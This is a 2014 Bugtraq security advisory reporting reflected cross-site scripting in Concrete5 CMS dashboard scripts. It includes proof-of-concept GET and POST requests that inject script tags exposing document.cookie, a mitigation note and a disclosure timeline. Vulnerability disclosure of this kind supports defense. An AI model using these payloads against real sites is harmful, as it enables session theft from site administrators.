[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities
- From: simo@xxxxxxxxxxxxx
- Date: Tue, 9 Dec 2014 09:51:43 GMT
Title: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities
Author: Simo Ben youssef
Contact: Simo_at_Morxploit_com
Discovered: 02 November 2014
Updated: 9 December 2014
Published: 9 December 2014
MorXploit Research
http://www.MorXploit.com
Vendor: Concrete5
Vendor url: www.concrete5.org
Software: Concrete5 CMS
Versions: 5.7.2 and 5.7.2.1 (probably older)
Status: Unpatched
Vulnerable scripts:
single_pages/dashboard/users/groups/bulkupdate.php
tools/dashboard/sitemap_drag_request.php
Original document: http://morxploit.com/morxploits/morxconxss.txt
About Concrete5 (from Wikipedia):
Concrete5 is an open source content management system (CMS) for publishing
content on the World Wide Web and intranets.
Concrete5 was designed for ease of use, for users with a minimum of technical
skills. It enables users to edit site content directly from the page. It
provides version management for every page, similar to wiki software, another
type of web site development software. concrete5 allows users to edit images
through an embedded editor on the page.
To learn more please visit:
http://en.wikipedia.org/wiki/Concrete5
http://www.concrete5.org/
Description:
Concrete5 is vulnerable to Cross-Site Scripting, both bulkupdate.php and
sitemap_drag_request.php scripts fail to properly sanitize user-supplied input.
PoC Exploit:
bulkupdate.php XSS is exploitable through $_REQUEST['gName']
Using HTTP GET Method:
http://target/index.php/dashboard/users/groups/bulkupdate/search?gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search
Using HTTP POST Method:
POST http://target/index.php/dashboard/users/groups/bulkupdate/search
POST DATA:
gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search
sitemap_drag_request.php XSS is triggered through $_REQUEST['instance_id'] but
requires a valid ccm_token value which makes it unexploitable (unless the
attacker somehow obtains a valid token)
Using HTTP GET Method:
http://target/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id="><BODY
ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=over
Mitigation:
Validate/Sanitize user supplied-input through $_REQUEST['gName'] and
$_REQUEST['instance_id']
Disclosure time-line
02 November 2014: Discovery.
03 November 2014: Initial report sent.
11 November 2014: Second contact.
No response.
09 December 2014: Public disclosure.
Author disclaimer:
The information contained in this entire document is for educational,
demonstration and testing purposes only.
Author cannot be held responsible for any malicious use or damage. Use at your
own risk.